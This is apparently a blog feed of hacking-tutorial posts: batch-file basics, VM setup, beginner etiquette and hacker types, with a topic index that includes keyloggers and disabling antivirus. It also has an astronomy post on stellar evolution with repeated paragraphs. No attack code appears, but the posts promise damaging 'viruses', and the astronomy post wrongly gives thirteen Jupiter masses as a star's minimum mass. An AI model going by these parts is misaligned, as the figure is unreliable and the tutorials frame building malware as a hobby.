I recommend you use a virtual machine running a Windows OS if you want to follow along yourself. This is as much for safety as it is for convenience. This tutorial is pretty safe but from the next one we’ll start building viruses. The first virus we’ll look at will overload the computer’s memory. That is, the computer will run out of RAM and likely freeze up and shut down. While this is unlikely to cause any lasting damage, using a virtual machine will still be more convenient simply because you won’t have to keep restarting your computer because it crashed. Soon after this we will get to viruses that can do some very real and permanent damage to your system. You don’t want to hack yourself, right? So you might as welll earn how to setup a virtual machine for hacking practice before continuing.

Now let us begin.

What are batch files?

A batch fileis the name given to a type of script file, a text file containing a series of commands to be executed by the command interpreter. Batch files have the extension .bat (or.cmd). They can be easily created using any text editor such as notepad.

Now let’s see some of these commands.

echo Hello World

The echo command is used to print out a message, in this case “Hello World”. Type up the above in a text editor and save it assomething.bat. Now open it and a command window pops up. But you’ll notice that it closes before we get a chance to see what it outputs. Let’s fix that.

echo Hello World
pause

Thepausecommand pauses the execution of the batch file until a user presses a key. You should now see the following output:

C:\Users\Akhil\Desktop>echo Hello World
Hello World
C:\Users\Akhil\Desktop>pause
Press any key to continue . . .

C:\Users\Akhil\Desktop> is where the execution is happening. In my case, I’ve saved the batch file on the desktop. The batch file seems to be printing the commands before executing them. It first prints echo Hello World then actually executes it to output Hello World. Let’s see if we can clean this up a bit.

@echo off
echo Hello World
pause

And this outputs…

Hello World
Press any key to continue . . .

Much better.@echo off is used to stop the commands from being printed and leaves only the output of those commands. Now let’s add a little dynamic behavior.

@echo off
set a=Akhil
echo Hello %a%
pause

Thesetcommand is used to define variables that can hold different values, in this case the string “Akhil”. The variable name enclosed within %% is how we access the value stored in the variable. Run the above and you should see

Hello Akhil
Press any key to continue . . .

Be careful here, the set command is pretty sensitive about the use of spaces:

set a=Akhil meansahas the value ‘Akhil’
set a= Akhil (with a space after the=) means ‘a’ has the value ‘ Akhil’ (with a space before it) and
set a =Akhil with a space before=) means that the variable is not defined asabut asa(‘a’ followed by a space).

Some commands come with modifiers that slightly alter their behavior:

@echo off
set /a a=5
set /a b=10
set /a c=%a% + %b%
echo %c%
pause

In set /a, the/apart is telling set that it should treat the value of the variable as a number, allowing us to perform mathematical operations on it.

@echo off
set /p a=Enter your name: 
echo Hello %a%
pause

The /p modifier tells the set command that it should take in some input from the user and store that in the variable a. When you run the batch file, you will be prompted to enter something. The output looks like:

Enter your name: Emily
Hello Emily
Press any key to continue . . .

Examples of Batch Files

That was pretty easy, now let’s take a look at a couple more batch files that might actually be useful and then we’ll go and make some viruses.

Pinger

@echo off
title Pinger
set /p target=Enter IP address or URL: 
ping %target% -t
pause

This outputs:

Enter IP address or URL: google.com
Pinging google.com [216.58.220.206] with 32 bytes of data:
Reply from 216.58.220.206: bytes=32 time=26ms TTL=57
Reply from 216.58.220.206: bytes=32 time=25ms TTL=57
Reply from 216.58.220.206: bytes=32 time=27ms TTL=57
Reply from 216.58.220.206: bytes=32 time=25ms TTL=57
Reply from 216.58.220.206: bytes=32 time=26ms TTL=57

Pretty handy if you want to quickly ping an IP address/URL or check your internet connection.

P.S: Pressing CTRL+C forcefully stops any running command (like ping -t which likes to run forever).

Shutdown timer

The batch file schedules a shutdown after X minutes.

@echo off
title Shutdown Input
set /p mins=Enter number of minutes to wait until shutdown:
set /a mins=%mins%*60
shutdown -s -t %mins%

This was but a glimpse of what batch files can do. Almost anything your operating system does for you can be done through batch files. You can even use them to automate repetitive and boring tasks. The limit is only your imagination.

One of these imaginative uses is creating batch file viruses and that is just what we’re going to learn now. Let’s start with the famous fork bomb.

Setting up a Virtual Machine to practice Hacking

Sat, 06 Jun 2020 09:09:28 GMT

Now that we’ve got the introduction to hacking out of the way, there’s just one last thing left before we can actually start hacking.

Due to the *ahem* sensitive nature of our field of work, I recommend you use a virtual machine and not your personal native OS for doing anything you’re not familiar with. Virtual machines are perfect for practicing hacking:

You can do whatever you want inside a VM and just hitresetand you’re back to a working OS
You can blow it up however you want, see what happens when you delete important stuff and do unspeakable things to it withzero risk of damaging your actual system.
It’s cross-platform. Are you on Windows? Mac? Linux? Doesn’t matter. You can run all of theseinsideeach other.
It’s free.Officially free, that is, no need to pirate or download from shady sources. (At least for Windows and Linux)

In the following few tutorials, we’ll need to use Windows. So here we’re going to see how to setup a Windows Virtual Machine. Eventually we’ll move on to using Kali Linux for more advanced hacking.

Now, let’s get to it.

Step 1

For creating a virtual machine we need two things: the virtualization software and the OS image file.

The Virtualization Software: I recommend VirtualBox. It’s free and cross platform.
The OS Image: You can find a bunch of Windows OS images here.
Microsoft is currently offering Windows 7 through 10, pick whichever you want. I picked Windows 10 Stable.
Make sure to select the right platform. For us that’s VirtualBox.
Click the download button (it’s about 4 GB).
If you encounter any issues, you can view installation instructions.

These OS images that Microsoft is offering are meant for testing and not normal usage. It’s validity is 90 days after which we’ll have to reset the virtual machine back to keep using it. To do this, we’ll take a snapshot of the initial state. Using a snapshot is also an easy way to reset the virtual machine back to a working state should something bad happen, which it will because we’re here to practice hacking.

After the download is complete, you should have a zip file that contains MSEdge - Win10_preview.ova. This is our image file. Now we need to load it up into VirtualBox.

Step 2

Extract the .ova file somewhere and start VirtualBox. Click File -> Import Appliance.

Step 3

Now find your .ovaf file and click Next.

Step 4

Click Import.

Step 5

And now your virtual machine is setup, you should see something like this:

Step 6

Just a couple more things and then we can fire it up. Go toSettings, then theDisplaytab and increase the video memory to128 MB. This will allow you to use the virtual machine in full screen and make it a bit more responsive.

Step 7

Click Snapsho in the upper right corner and then the camera button to create a snapshot. (Ideally, you should do this before starting the virtual machine for the first time)

Step 8

Step 9

And that’s it. Hit Start and our virtual machine is ready to handle all the abuse we’re about to throw at it.IfWhen something goes wrong, simply restore the snapshot and it’ll work again.

Now you’re ready totest a variety of hacking techniques while keeping your own system safe. The virtual machine effectively acts as a sandbox, protecting you from yourself. In a future tutorial, we’ll expand upon this by setting up networking with virtual machines, which allows you to do even more such as practicing hacking webcams or penetration testing firewalls or setting up man-in-the-middle attacks and so on.

We have a long and very interesting road ahead of us. But for now, we’re going to start off with something small and powerful. Say hello to batch file viruses.

Not being a Noob

Sat, 06 Jun 2020 03:27:47 GMT

Now that we have abasic grasp on ethical hacking, we need to address something before we proceed further. The following article assumes that you are a complete beginner and will likely help you every step of the way in becoming a hacker. This article is for anyone who wishes to communicate their troubles efficiently and getting their questions answered without uncalled-for rudeness. If you are a programmer or have other considerable technical experience, feel free to skip this one.

The purpose of this course is to teach you hacking, but hacking is really something that can only be self-taught. If you are indeed serious about hacking, you will first have tolearn how to learn.

Where to ask for help with hacking?

When learning something new, you are going to run into problems. Everyone does, it’s all a part of the journey. You’ll find that there are plenty of online communities where you can go and ask questions and just find help with something. A couple of those are:

And of course, there’s a community of ethical hackers and me on leeward Hackers always happy to help with any queries you may have.

How to ask for help?

“Just Google it!”
“Please read the rules and code of conduct before posting”
“If you can’t do it, doesn’t mean it doesn’t work.”

These are just some of the replies I frequently come across on various blogs, forums and comment threads around the internet. As a beginner, you need to understand that when you’re asking someone for help, you’re asking a stranger to take time out of their day and devote it to you, another stranger.It is your responsibility to prove that you are worth helping.

So many online communities are full of friendly people willing to help beginners get up to speed. And yet, noobs are still everywhere:

“Fake.. Doesn’t work.”
“I tried but wasn’t able to do this thing.. how do I do this thing?”
“How to hack FB easily?”
“Need hacking tool for this online game..”

You can see why these sorts of half-assed attempts at trying to get someone else to do your work are often ignored and even ridiculed. And in hacking, what these ‘noobs’ are usually trying to do is most likely selfish, unethical and even illegal. You are not going to find help like this.

On the internet, you come across all sorts of people from all walks of life. Most people at one point or another, encounter someone who instead of answering or just ignoring a sincere question or request, chooses to be rude and mocks the person asking the question.

Why does this happen? Why do we still see so many pointless conversations? Why so many questions that have been asked and answered a million times still seem to stagger some? How to get out of this vicious cycle? How to avoid coming across as a noob and how to help others who are in fact not so different than us? It’s time someone answered these questions. So, here’s my attempt.

Admittedly, this may seem a bit general but not being a noob(or at least not looking like one) holds great importance specially for beginner hackers. This is because the only way to get help is from someone who has experience in this field. It isn’t hard to understand the lack of patience when it comes dealing with people who are just looking for shortcuts instead of trying to learn and contribute something.

When you ask for help online, it’s important to do so in a way that’s mindful of the readers time. Not only does this make it more likely that you’ll receive a helpful reply but it also helps other people with the same query who may find your page in the future. This is how you ask a question:

Google before asking.Why waste your own and others time when a question has already been answered elsewhere? Google your question before posting it in a forum or community.
Use proper grammar.If people can’t understand you, they can’t answer your questions. If English isn’t very good, then you really should learn English first as the majority of content on the internet (including hacking tutorials) is in English.
Clearly state the problem.Mention what you are trying to do and why you cannot seem to do so.
What all have you tried?Tell the readers what all solutions you found on Google and that none of them solved your problem which is why you’re asking for help.
Tell us your specs. Don’t leave out any important information that a reader may need to answer your question. Mention all the relevant details such as your operating system, version of software etc.

So long as you do this, you will receive polite and helpful answers to all your questions and you will be making the internet a better place for everyone.

A couple of points deserve to be explained further. These are some common red flags that signal that the person asking a question has only selfish interest in mind not learning.

Asking Google-able Questions

Yes, this again. There’s an awful lot of people on our little planet. Say you want to go out to congratulate everyone who has a birthday today and take 10 seconds per person. Assuming a conservative average of 20 million birthdays a day, it will take you over 6 years, if you went 24 hours a day, everyday. By that time, of course the last person would have aged 6 years and would not be very happy with you. What’s the point of telling you this? Not only that statistics are fun but more importantly: There’s an awful lot of people in the world.

With this in mind, there’s a very good chance that when you face a problem, somewhere someone else has already faced and overcome the same problem in the past. The answers are right there on the internet, waiting to be googled.

Further, Google has a ridiculously large webpage index (over 30 trillion freaking pages). Say you type something in the Google search bar, notice that it comes up with numerous suggestions, millions of pages most of the time. That means someone has probably typed that before. It’s like almost everything we’ll ever think, has already been thought of by someone else. Consequently, majority of what we’ll ever search on Google has already been searched by someone else and there’s a good chance that your problem has already been solved.

So before doing anything else, you should always Google for a solution to whatever problem you are facing. Not only is this much quicker for you, but it saves others time as well. Life is short. Learn to Google.

Asking unethical questions

This is a big issue in hacking. If your only goal is to hack your ex-girlfriend’s facebook account or steal your neighbor’s WiFi (all the while without having the slightest inclination towards educating yourself), while strangers on the internet cannot stop you from trying to do such things, they are almost certainly not going to help you.

I started this website ~4 years ago, in that time I have received literally tens of thousands of request to hack someone’s facebook account. I haven’t replied to a single such request and I don’t plan on ever doing so. To an expert hacker, when someone asks a question, their intentions are immediately clear. Noobs are not fooling anyone.

Your morality is up to you but do not expect others to help realize your petty ambitions.

Expecting too much

Hacking is not magic. When a problem presents itself, a hacker should break it down into logical steps and find a solution. Movies have engraved in the minds of naive viewers that expert hackers are practically magicians. According to movies, an expert hacker might as well be typing any nonsense on his/her keyboard (while blindfolded) and the greatest glories and accomplishments can be achieved. Entire nations can be supposedly hacked, gazillons of dollars await hackers just a few keystrokes away and what not. According to movies, tomorrow we may even see evil hackers burning our morning toasts and remotely hacking into our mobile phones and programming them to grow wings and fly off. No. Please stop.

To the astonishment of noobs, there is no top-secret program that can suddenly turn them into an expert. When performing any hacking technique, there are a set of steps one must carry out methodically to attempt to hack something. Further, the majority of the tools used are actually free, in fact most are open-source. Remember Google-able questions? This is one of them.

When a person asks a question about which they have little to no knowledge, it is obviously going to drive away potential respondents. What the person needs to understand is that the respondent is doing them a favor. Nobody is going to sit down and happily write a custom spoon-fed tutorial, so that the person can then mindlessly follow it and obtain something they clearly do not deserve. Everyone’s time is valuable and if the person is asking a total stranger for an unreasonably big chunk, they are going to be ignored.

The world will always be moving fast and it is up to us to keep up. Humanity’s collective intelligence will always surpass any individual’s intelligence. It is for this reason, hackers, more than any other groups, should learn to learn from and teach others, peacefully. Exchange of information and ideas are the pillars keeping the hacker community alive, bonded and continually rising to greater heights.

So that’s that and now we’re finally ready to begin learning hacking. Let’s start by creating our very own viruses.

More on Hacking

Fri, 05 Jun 2020 08:36:44 GMT

Who is a Hacker?

In computer networking, hacking is any technical effort to manipulate the normal behavior of network connections and connected systems. A hacker is any person engaged in hacking. The term “hacking” historically referred to constructive, clever technical work that was not necessarily related to computer systems.

Today, however, hacking and hackers are most commonly associated with malicious programming attacks on the Internet and other networks.

Origins of Hacking:

M.I.T. engineers in the 1950s and 1960s first popularized the term and concept of hacking. Starting at the model train club and later in the mainframe computer rooms, the so-called “hacks” perpetrated by these hackers were intended to be harmless technical experiments and fun learning activities. Later, outside of M.I.T., others began applying the term to less honorable pursuits. Before the Internet became popular, for example, several hackers in the U.S. experimented with methods to modify telephones for making free long-distance calls over the phone network illegally.

As computer networking and the Internet exploded in popularity, data networks became by far the most common target of hackers and hacking.

Hacking vs. Cracking

Malicious attacks on computer networks are officially known as cracking, while hacking truly applies only to activities having good intentions. Most non-technical people fail to make this distinction, however. Outside of academia, its extremely common to see the term “hack” misused and be applied to cracks as well.

Common Network Hacking Techniques

Hacking on computer networks is often done through scripts or other network programming. These programs generally manipulate data passing through a network connection in ways designed to obtain more information about how the target system works. Many such pre-packaged scripts are posted on the Internet for anyone, typically entry-level hackers, to use.

More advanced hackers may study and modify these scripts to develop new methods. A few highly skilled hackers work for commercial firms with the job to protect that company’s software and data from outside hacking. Cracking techniques on networks include creating worms, initiating denial of service (DoS) attacks, or in establishing unauthorized remote access connections to a device.

Types of Hackers

Fri, 05 Jun 2020 04:00:21 GMT

So we know what hacking is, now let’s talk about hackers. There are a lot of things that distinguish different kinds of hackers. Most importantly, skill and motivations. That is, what are you trying to accomplish and how far are you willing to go? This is the question I want you, the reader, to ask yourself at the end of this article.

Script Kiddie

Script kiddies, in a word, are noobs. People who want to hack for shortsighted selfish reasons without having any inclination to actually learn something. These are the people who’d rather spend their time looking for some secret tricks that they think real hackers use. They may figure out how to use tools and scripts made by others but they can neither make their own tools nor do anything that involves a task more complex than copy-pasting. A script kiddie is that one annoying kid in class who pisses off everyone else. Don’t be that guy.

Black hat

Black hat hackers are the bad guys. They are cyber criminals with malicious intents who’s only goal is personal gain or sabotage. They are digital thieves money, they steal credit card information, valuable data and identities. They infect systems with viruses, trojans and malware and create botnets to do their bidding. They cost the hardworking and honest people around the world billions of dollars each year. Some do it out of greed, some do it to show off while some others just want to watch the world burn.

White hat

White hat hackers are the good guys who hack for improving the security of systems. The field of penetration testing involves probing a system, say a website or a company’s internal network, to look for vulnerabilities. The white hats (or penetration testers) find these security flaws and help the developers fix them. While the majority of the hacking process is the same for white hats and black hats, there’s a world of difference when it comes to their intentions. White hats want to help patch up vulnerabilities whereas black hats want to exploit them.

Software security is one of the fastest growing fields today. More and more companies are hiring security specialists as well as offering bug bounty programs. Whether you simply want a hobby or wish to go further, the world of cyber security has you covered.

Grey hat hackers

These are the hackers who may work offensively or defensively depending on the situation. Hackers who don’t have malicious intentions but still like to break into third-party system just for the thrill and fun or maybe just to announce a newfound vulnerabilty in a wild and supposedly heroic way.

Remember, breaking into a company’s internal network without authorization or taking a peek at a private database just for fun is just as bad as malicious hacking in the eyes of the law.

Hacktivists

These are the hackers who use their skills as a means of protesting against injustice and protecting human rights such as free speech. They attack a system or website to popularize a notion or gather attention to a specific case for rectification. They are vigilantes, the dark knights of the hacking universe. This is where good intentions collide with the law, for hacktivists may or may not carry out illegal activities to get their point across to the world. They are outlaws who deliver their own brand of rough justice. Anonymous, LulzSec and WikiLeaks are a few notable hacktivist groups.

Government

The potential consequences of government hacking are so enormous and far reaching that I feel compelled to put them in a different category. Imagine an adversary that not only has access to billions of dollars but also decides the laws in your country. An adversary who wants control over every aspect of your life. How do you defend against such an opponent?

This is increasingly becoming a global problem. Instead of protecting the human right to privacy, governments around the world are opting to violate it, following in the footsteps of NSAand GCHQ. In the coming tutorials, protecting your privacy is going to be an ever-present concern for us.

You

What about you? Which side are you on? Decided anything yet? Don’t worry, you’ll have plenty of time to figure it out. Every single one of the above types of hackers make use of the same hacking techniques. They all start out the same way, they all learn the same things but they end up in vastly different places. No matter what you pick, remember that hacking is a practical field and you will be on the front lines.

Now let us begin our journey by learning how to create viruses. But before we can do that, let’s get you all set up with a virtual machine so that you don’t accidentally wreck your computer. Safety first, right?

What is Hacking?

Thu, 04 Jun 2020 07:23:06 GMT

A person who is able to discover a weakness in a system and manages to exploit it is called a hacker and this process is known as Hacking. Hacking is an art. It is the mastery of a system that gives you complete control over it. It is the act of modifying the inner workings of a system, in order to make it do something that it’s original creator never intended.

That’s the gist of it. But as with all things, the devil is in the details. This is what this website is for.

I’m going to make a broad claim here: The only thing you need to become a hacker is interest and dedication. But more than anything else, you need a thirst for knowledge. You should always be willing to learn something new, always open to new ideas. So come with me, follow along these series of tutorials and before long you’ll see for yourself that the claim has been justified.

Before moving on, there’s a couple things that we need to address.

First of all, privacy. Your data is everywhere, a part of you sitting on some servers around the world. Privacy is your right to decide who can use that data and how.The internet as we know it came into being decades ago. At the time, it wasn’t built with privacy in mind. But things have changed now. Not only do we need to protect ourselves against malicious agents but maybe, just maybe, a day may come when we must protect ourselves from those who are meant to be protecting us, our governments. Because of this, hacking no longer means just exploiting or patching up security holes in a system, it is now alsoa means of protecting a basic human right, the right to privacy.

Secondly, these days the only side of hacking that people hear about is the bad one. Credit card theft, identity theft, ransomware, stolen accounts and data and so on. The mere wordhackingbrings with it an inherently negative vibe. It doesn’t have to be this way. We hear about millions of accounts being leaked, attacks on major websites, attacks on individuals but we near really hear about all the attacks that never occurred.

There is a whole other side to hacking that never quite gets to see the light of day.

For every major hack that makes the news, many more are prevented by security specialists. These people, these whitehat hackers, possess exactly the same skillset as the blackhats, but they choose to use them for good. No software can ever be completely secure and that makes cyber security a cat and mouse game. A race between whitehats and blackhats. A battle of angels and demons, the stakes of which have never been higher than they are today. The global cost of cyber crime is projected to reach $2 trillion by 2019 and today it crossed that limit far ago.

The question is- Which side are you on?

I want to become a professional hacker but can't find the right resources | Problem Solved

Thu, 04 Jun 2020 04:46:04 GMT

Welcome Note

Welcome! This is what you have been searching for. This post will be updated regularly so that you can easily navigate through this blog and its knowledge. Before we start I want to remind you of a very important perspective, take it as a caution.

It is always you who is responsible for the knowledge or wisdom you gained and also it is you who is responsible for your actions with your knowledge. Providing and sharing knowledge is primitive and the only way for any subject or culture to survive.

The above quote can be reduced to: "This blog is for Educational Purpose Only"

Straight to the point: There are many social media platforms for regular groups and many of the Hacking/Programming/Cyber-Seciruty information groups are hosted on these platforms. But we at Leewardslope want to create a separate and dedicated platform for hackers and cybersecurity experts for organized discussions.

Want to join us and follow your favorite hacker and get realtime updates and news? Why wait then, Join Us at Leeward Hackers.

Under Construction, we will be back soon.

Hacking is an art, and it takes years of practice to master it. So how to get started? Having no idea about hacking is okay, but being a newbie with computers, in general, is not allowed. When I say beginner, I mean someone who has no experience with programming and with hacking methodologies. I didn't mean someone who needs a one-page guide on how to download a tool. If you want to be a hacker, you have to work hard. So how to get started?

Introduction to Hacking

Creating a Virus

Fun Stuff

What is DDoSing?

Introduction
The Art of Hunamm Hacking
Phishing

Linux

Installing Kali
Recommended Reading

How to Hack WiFi

Hacking WEP
Hacking WPA
More on Hacking WiFi
Hacking WEP 2
Recommended Books

Information Gathering

Introduction
Exploring NMap
Information Gathering with theHarvester

Metasploit

Introduction to Metasploit
Command Crash Course
Exploitation: Basics
Exploitation: Examples
Aurora
The Heartbleed bug
Hacking Webcams
Remote Keyloggers
Disabling Anti Virus

More Hacking Tools

Wordlists with Crunch
THC Hydra

Tor Browser

Why Tor?
How Tor Works
Using Tor
The Deep Web

Networking

MAC Addresses
What is MAC Address Spoofing?
Spoofing on Android
Spoofing on Windows
Spoofing on OS X

Privacy

The Zero Trust Principle
Government Surveillance
Choosing a Strong Password
Using Proxies
How to send secure mails using Proton Mail
Recommended Reading

General

Abbreviations
Common Terms
Common Tools
The Ultimate Hacking Cheat Sheet
Anonymous
Hacking Facebook
Rooting your Android Phone
Website Hacks
Understanding Viruses
Uprooting Viruses
On Hashes
All About Cookies
General Protection
The CIA Rule Book of Malware Creation
The best Documentaries for Hackers
The Top 5 Books for Hackers
Quantum Computing and Digital Security
Going Pro

Others

Programming 1
Programming 2
RAT's
Limits of Legality

A detailed guide on stellar evolution or the life of starts

Mon, 01 Jun 2020 16:06:01 GMT

I’m back again, but not like some random tech junkie - I’m back as a physics student. So in this post let’s kill some stars rather than falling on some random technology.

Introduction

We’ve learned in pre school or college about what happened for the first billion years or so in the history of the universe, which leaves us with lots of stars and galaxies, and we are now equipped with the terminology needed to describe and categorize these stars.

But hold on, we still haven’t talked about all the other elements on the periodic table, we’ve only know about Hydrogen (H) and Helium (He) so far, we got these from Big Bang Nucleosythesis.

So where did the rest come from?
And what about all the planets and moons?
How did those get here?

The answer to all of these questions will make sense once we learn more about what goes on inside a star, from the moment they are born, to the time of their death. That’s right, stars actually die, so to speak, and the type of death, along with what’s left over, will be one of a variety of possibilities, depending entirely on the mass of the star.

So let’s go through the lifetime of a few different kinds of stars, so that we are ready to understand the next 13 billion years of development in the universe. The life cycle of any star, from birth to death, and all the stages in between, will span millions or even billions of years. This is why stars don’t seem to change at all, because a human lifetime is a snippet of a fraction of a blink of an eye to these behemoths.

The path that will be followed by a particular star depends mainly on its mass, or how much gas collected and collapsed to form the star, because that material will serve as the star’s fuel. As we may remember from physics and chemistry, when nuclei collide with enough energy so as to overcome the electromagnetic repulsion between them, the strong nuclear force takes over, and they fuse, with a small fraction of their mass converting into huge amounts of pure energy, as dictated by E equals MC squared.

Therefore, only by colliding nuclei together and fusing them in its ultra-hot core can a star release enough outward energy to counter the effects of gravity relentlessly crushing inward. This means that the amount of matter that forms the star determines the amount of fuel, and through a variety of other factors, the lifetime and eventual fate of the star. Given that mass is the key factor here, let’s start with a low-mass star.

Low Mass Star

This would range from the smallest that stars can be, meaning the smallest amount of material that can sufficiently trigger nuclear fusion so as to qualify as a star, which is about thirteen Jupiter masses, to a star somewhere in the ballpark of our sun’s mass.

Main Sequence Star

As we already know, any star will begin as a cloud of gas and dust at least a few light years across. In the earliest era of star formation, this material was almost exclusively hydrogen and helium, as this was what remained after the brief seventeen minutes of nucleosynthesis soon after the Big Bang. This matter collects due to gravity, pushing increasingly inward as it contracts, until things get so hot over a few million years that nuclear fusion eventually begins, establishing an equilibrium, and generating a yellow or red main sequence star that glows with all the energy released from the collisions happening inside.

These fusion reactions begin with two protons fusing, followed by subsequent beta decay, to get a proton and a neutron, and we call this a Deuteron, which is a nucleus of heavy hydrogen. Then Deuterons are involved in reactions that make Helium, which has two protons and two neutrons.

Such a star will continue in this manner for billions of years, slowly fusing all of the hydrogen in its core into helium, and maintaining a relatively steady size, temperature, and luminosity as it does so, until almost all of the hydrogen is gone.

Red Giant

At this point, things really begin to change. The core of the star will shrink and get hotter, which makes the remaining hydrogen burn even faster, and all of that extra energy being generated will radiate outwards and push the outer layers away from the core. As the outer layers expand, they cool, and thus become more and more red, and the star climbs up the red giant branch until we have a red giant star.

Helium Flash

The star can maintain this new status for a little while longer, around a billion years, but after almost all the hydrogen is gone, the core gets even smaller and even hotter. At this stage, a phase called helium flash, things are so hot that the star is able to fuse these heavier Helium nuclei into larger nuclei like Carbon, and then oxygen, through something called the triple-alpha process, and this means that the star has a whole new source of fuel in all the helium it has been making for billions of years.

Horizontal Branch

The star begins pulsating as it runs through its final energy reserve, entering what we call the horizontal branch, and in this time it becomes smaller, hotter, and bluer, until at last much of the helium has been fused into larger nuclei.

Asymptotic Branch

Once the core is predominately carbon and oxygen, with just a shell of helium around it, and a shell of hydrogen around that, the star has very little material left to burn, so the core will collapse and the star enters the asymptotic giant branch. This means it will grow rapidly and become a giant star again, until the last bursts of energy eject the outer layer, pushing it away from the core and back into the interstellar medium, leaving only a tiny, very hot, bare core behind, about the size of Earth. This will gradually cool, as it has no more fuel to burn, not being hot enough to fuse carbon or oxygen nuclei, and it will contract further until we are left with a white dwarf star.

Planetary Nebula

The ejected shell is called a planetary nebula and the material in a planetary nebula will then become available to join more gas particles to form yet another star.

which is misleading, since it is not a planet and did not come from a planet, but the name originated from confusion upon its discovery, and it stuck.

White Dwarf

Lower-mass stars that begin with less than about eight solar masses leave behind white dwarfs, because once reduced to its lighter earth-sized core, there is not enough gravity to overcome electron degeneracy pressure

In other words, a white dwarf will become kind of like one gigantic metallic solid, with the electron clouds around the nuclei pushing against each other and preventing further collapse. Even still, this object is very dense, with one teaspoon weighing around fifteen tons.

So below around 1.4 solar masses, the maximum mass of a white dwarf, which is also known as the Chandrasekhar limit, this is the fate of the core of a star.

High Mass Star

Now for a high-mass star, ones much more massive than our sun, things are quite different. Their demise will not be so quiet. Big stars go out with a bang. Things start out normally, with a gas cloud collecting under the influence of gravity. It is simply that this cloud will be much larger than those that form low-mass stars, so it will contain much more mass. More mass means more gravity, which means the force pushing inward is much stronger, and the star gets much hotter.

Main Sequnce Star

A hotter temperature means faster fusion, which generates greater outward pressure to counteract the greater inward pull of gravity. This will result in a main-sequence star that is hot, big, bright, and blue. This is where things start to go differently from low-mass stars.

Giant Star

Whereas low-mass stars take billions of years to use up all their fuel, high-mass stars are much hotter and burn their fuel much faster. That means they use up all the hydrogen in their cores in around just a fleeting hundred million years, or even ten million if big enough. As the fuel starts running out, the core contracts and heats, producing more energy, so the star will swell up into a giant star, just like we saw for low-mass stars.

Iron Core

But while the core of a high-mass star continues to compress, it gets much hotter than the core of a low-mass star, and it becomes able to fuse helium nuclei to form carbon, and then oxygen, and then neon, and then silicon, each heavier nucleus being relegated to a smaller and smaller region of the core that is hot enough to fuse it All the way at the center sits the heaviest element that can be fused within a star, iron.

Supernova

As this occurs in these different layers, each performing a particular type of fusion until no fuel remains, the star is left with a core of iron nuclei that are so stable that further fusion can release no more energy. At this point, gravity wins the fight, and the star collapses within a single second, the outer layers bouncing off the core and triggering an explosion, thus ejecting all of the heavy nuclei the star has created, out into space. This awesome event, one of the most violent and energetic phenomena in the universe, is called a supernova.

A supernova generates such an unbelievable burst of energy that in this brief moment, dozens of elements heavier than iron can also be synthesized. Nickel, copper, zinc, silver, gold, any element with an atomic number greater than twenty-six, is made either in a supernova, or a rare event like the collision of two neutron stars, or a neutron star and a black hole, which are objects we will discuss in a moment. That’s why these heavy elements are so rare compared to elements like carbon and oxygen, because stars can’t synthesize them the way they can synthesize all the elements up to iron throughout their long lives.

Nature only makes these rare elements during the death of a high-mass star, or in certain exotic collision events. Supernovae are also so bright that they are brighter than the entire galaxy they belong to when viewed through telescopes, and if in our own galaxy, they can even be visible with the naked eye, like the one that generated the famous Crab Nebula, which was recorded by a variety of civilizations in 1054.

Neuron Star

Now, a supernova does not leave behind a white dwarf. Lower-mass stars that begin with less than about eight solar masses leave behind white dwarfs, because once reduced to its lighter earth-sized core, there is not enough gravity to overcome electron degeneracy pressure.

So below around 1.4 solar masses, the maximum mass of a white dwarf, which is also known as the Chandrasekhar limit, this is the fate of the core of a star.

But for a high-mass star, where upon its death the core of the star is above the Chandrasekhar limit, which means it is massive enough for a supernova to occur, one of two things will be left behind.

If the core is between around 1.4 and 3 solar masses, having been generated by a star that was originally somewhere in the ballpark of ten to forty solar masses, the core will not be able to support itself against gravity, and it will collapse with such tremendous force that all the electrons get squeezed into protons such that they combine to form neutrons, and the shockwave from this event is what triggers the supernova. The object that remains is a ball of neutrons bunched up together, like one huge atomic nucleus the size of New York City, containing all of the mass originally within the core of the star.

A teaspoon of a neutron star would weigh a whopping ten million tons! But even more miraculously, if the core of the star is above around three solar masses, even the outward pressure of neutrons pressing right up against each other, or neutron degeneracy pressure, is not enough to stop the immense gravity, and the neutrons will be crushed together as the remaining mass collapses into a single point of infinite density.The entire mass of the star’s core, contained within zero volume. This object is called a black hole.

Blackhole

If the core of the star is above around three solar masses, even the outward pressure of neutrons pressing right up against each other, or neutron degeneracy pressure, is not enough to stop the immense gravity, and the neutrons will be crushed together as the remaining mass collapses into a single point of infinite density.The entire mass of the star’s core, contained within zero volume. This object is called a black hole.

The outer layers of the star that have been ejected, full of heavy nuclei fused during the lifetime of the star, and the additional even heavier ones formed during the supernova, will leave behind a colorful nebula. But the singularity that is left behind is anything but colorful.

A black hole, given its infinite density, warps spacetime so much that not even light can escape. Whatever a black hole might look like, if that can even mean anything, we will probably never find out, because it is impossible for photons to leave it and reach our eyes, which is how we see things.

As incredible as this may sound, this is how nature works, and black holes do indeed exist all over the universe, as the remnants of huge dead stars. Black holes are so fascinating that they will require a whole new post unto themselves, which I will get to in a next blog post.

Review

For now, let’s review what we just learned about the lifetime of a star. When a star forms from a gas cloud of some mass, which is almost always between a tenth of a solar mass and around thirty solar masses, a star is produced somewhere along the main sequence. As the fuel in the core begins to run out, it contracts, which raises the pressure around the core and pushes the outer layers outward, where they will then cool, producing a red giant.So all stars will have a red giant phase when their fuel is almost gone, regardless of their mass.

Then finally, when the star can no longer perform sufficient nuclear fusion so as to counter the effects of gravity, the star will collapse, leaving a white dwarf if it is of low mass, a neutron star if it is of intermediate mass, and a black hole if it is of especially high mass.

As we mentioned, black holes are among the most fascinating objects in the universe, and they are a popular area of study amongst astronomers and theoretical physics alike, because there is so much that we still don’t understand about these strange creatures. Let’s move forward and learn a little more about black holes in the next post.

Comprehensive guide for Installing Chrome OS with Play Store Support on any Laptop/PC - Not Cloudinary

Sun, 31 May 2020 10:40:32 GMT

Introduction to chrome OS

If you follow the below mentioned process you will not lose your data, existing operating system (mostly useful for windows users). We are going to install Chrome OS in a Triple Boot Style. Just mentioning in case if you are not aware, the number of boots (Tripe, Dual - whatever is the number) will not affect the performance of your PC (Any booted operating system), it will just consume extra space in your hard disk. But this is not the case if you use any android emulator in your PC, most of the emulators consume a lot of ram which make your overall performance poor

I hope you are aware and clear about the advantages of Triple boot over installing Chrome OS in Virtual Machine/ Virtual Box and over some random Android emulators. With this clear, let's begin - grab a coffee if you can as it sure does take a lot of time in downloading, extracting, auto-configuring and Installing. Here is an overall idea of what we are going to do.

Requirements

UEFI boot support in BIOS
Intel based CPU ( AMD CPUs are not tested)
16GB (min. 8GB) USB Flash Drive
Unallocated GPT space in HDD (not MBR) (Don't worry here is an explanation)
Decent Internet connecting
